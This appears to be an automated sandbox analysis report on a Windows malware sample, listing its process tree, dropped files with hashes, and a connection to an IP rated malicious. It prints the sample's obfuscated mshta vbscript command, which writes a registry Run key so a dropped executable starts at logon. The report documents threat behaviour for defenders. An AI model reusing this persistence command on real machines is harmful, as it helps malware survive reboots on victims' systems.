avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3164"C:\Users\admin\Desktop\40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe" C:\Users\admin\Desktop\40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe
explorer.exe
User:
admin
Company:
PC TOOLS
Integrity Level:
MEDIUM
Description:
ROCkStAr
Exit code:
0
Version:
7.06.0007
3280"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kunstudstillingengeometrisp"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe"",""REG_SZ"" : window.close")C:\Windows\System32\mshta.exe
40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2240"C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe" C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe
40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe
User:
admin
Company:
PC TOOLS
Integrity Level:
MEDIUM
Description:
ROCkStAr
Exit code:
0
Version:
7.06.0007
2592"C:\Users\admin\AppData\Local\Temp\WEALTH SERVER.exe" C:\Users\admin\AppData\Local\Temp\WEALTH SERVER.exe
40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe
User:
admin
Integrity Level:
MEDIUM
3120-m "C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe"C:\Users\admin\AppData\Roaming\Imgburn\imgburn.exeavancementernesindskudsstni.exe
User:
admin
Company:
PC TOOLS
Integrity Level:
MEDIUM
Description:
ROCkStAr
Exit code:
0
Version:
7.06.0007
2648"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kunstudstillingengeometrisp"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe"",""REG_SZ"" : window.close")C:\Windows\System32\mshta.exe
imgburn.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3688"C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe" C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe
imgburn.exe
User:
admin
Company:
PC TOOLS
Integrity Level:
MEDIUM
Description:
ROCkStAr
Exit code:
0
Version:
7.06.0007
4024"C:\Users\admin\AppData\Local\Temp\WEALTH SERVER.exe" C:\Users\admin\AppData\Local\Temp\WEALTH SERVER.exeimgburn.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
3708-m "C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe"C:\Users\admin\AppData\Roaming\Imgburn\imgburn.exeavancementernesindskudsstni.exe
User:
admin
Company:
PC TOOLS
Integrity Level:
MEDIUM
Description:
ROCkStAr
Exit code:
0
Version:
7.06.0007
4024"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kunstudstillingengeometrisp"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\avancementernesindskudsstni.exe"",""REG_SZ"" : window.close")C:\Windows\System32\mshta.exe
imgburn.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
21 826
Read events
21 347
Write events
0
Delete events
0

Modification events

No data
Executable files
55
Suspicious files
53
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2240avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DFB4C29FE64B8C48EE.TMP
MD5:
SHA256:
3688avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DF5FD31BC931A429DC.TMP
MD5:
SHA256:
2280avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DF755882D26BDD7184.TMP
MD5:
SHA256:
2816avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DF3E92E9504F6F1B40.TMP
MD5:
SHA256:
3388avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DF52706E726EABBEEF.TMP
MD5:
SHA256:
3772avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DFEFFD0EB4EA735B73.TMP
MD5:
SHA256:
2116avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DF8545560D93232CF7.TMP
MD5:
SHA256:
2700avancementernesindskudsstni.exeC:\Users\admin\AppData\Local\Temp\~DFB9C5273E0CBE057D.TMP
MD5:
SHA256:
2280avancementernesindskudsstni.exeC:\Users\admin\AppData\Roaming\Imgburn\imgburn.exeexecutable
MD5:9BBF73831BCA48E1CBDB8F66067497A2
SHA256:C0F99DF74DF33AA2755A9BE44BFDB2B4DFA2DA8F77A975583463AB5B43481BD6
316440eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exeC:\Users\admin\AppData\Local\Temp\~DF2B683F5C09A4A63B.TMPbinary
MD5:EC7E4B96E331A40A52ED3CF0AAB01E68
SHA256:A274CA8642D6135CCFA95730B3EA4281B1E06C7FE6EF80E35714207DCBF42C24
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
55
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2592
WEALTH SERVER.exe
194.5.99.51:2019
FR
malicious

DNS requests

No data

Threats

No threats detected
No debug info